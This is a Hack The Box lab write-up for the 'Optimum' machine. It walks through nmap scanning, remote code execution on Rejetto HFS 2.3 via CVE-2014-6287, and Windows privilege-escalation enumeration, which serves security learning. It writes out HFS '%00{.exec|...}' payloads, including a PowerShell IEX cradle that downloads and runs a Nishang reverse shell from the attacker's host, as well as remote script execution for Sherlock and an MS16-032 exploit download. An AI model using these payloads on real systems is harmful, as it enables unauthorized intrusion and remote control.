Skip to content

Latest commit

 

History

History
203 lines (163 loc) · 7.09 KB

optimum.md

File metadata and controls

203 lines (163 loc) · 7.09 KB

Hack The Box - Optimum

Machine IP: 10.10.10.8

Vulnerabilities:
  - Rejetto HTTP File Server 2.3: CVE-2014-6287 (w/o MetaSploit)

NMAP

▶ nmap -Pn -sS -p- 10.10.10.8 -T4 --min-rate 1000 -oN surface.nmap

Nmap scan report for 10.10.10.8
Host is up (0.18s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
▶ nmap -sC -sV -p 80 10.10.10.8 -oN deep.nmap

Nmap scan report for 10.10.10.8
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP #80

image

HTTP File Server 2.3

  • CVE-2014-6287 : The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HTTP Fileserver) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Exploit

image

Command Execution

▶ tcpdump -i tun0
%00{.exec|ping 10.10.14.21.}

image image

Reverse Shell (Nishang)

  • Invoke-PowerShellTcp.ps1 image

    • Copy and Paste the line of code to the bottom of the sciript.

    • Edit the code. image image

    • Upload the Nishang script.

    • Start a reverse Netcat listener.

%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.21:8000/Invoke-PowerShellTcp.ps1**w**').}

image image

  • Target system information.
PS C:\Users\kostas\Desktop>systeminfo

image

Privilege Escalation

WinPEAS

  • Start SMB server.
▶ sudo impacket-smbserver share . -smb2support
  • Copy winPEASx64.exe to optimum.
▶ copy \\10.10.14.21\share\winPEASx64.exe .

image

  • Execute winPEASx64.exe.
PS C:\Users\kostas\desktop> ./winPEASx64.exe

image No useful information was found.

Sherlock

  • Python Server
▶ python -m http.server

image

  • Edit, Upload and Run: Sherlock.ps1.
  • Add the line Find-AllVulns at the end of the script to call this function.

image

PS C:\Users\kostas\desktop> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.21:8000/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems                                                                                                                               

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable                                                                                                                                                
Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems                                                                                                                               

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable


Title      : Font Driver Buffer Overflow                                                                                                                           [0/1931]
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege 
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

image

Searchsploit

▶ searchsploit MS16-032

image

PowerShell Empire

  • Download Exploit: wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

Optional Reference: https://0xdf.gitlab.io/2021/03/17/htb-optimum.html#the-importance-of-architecture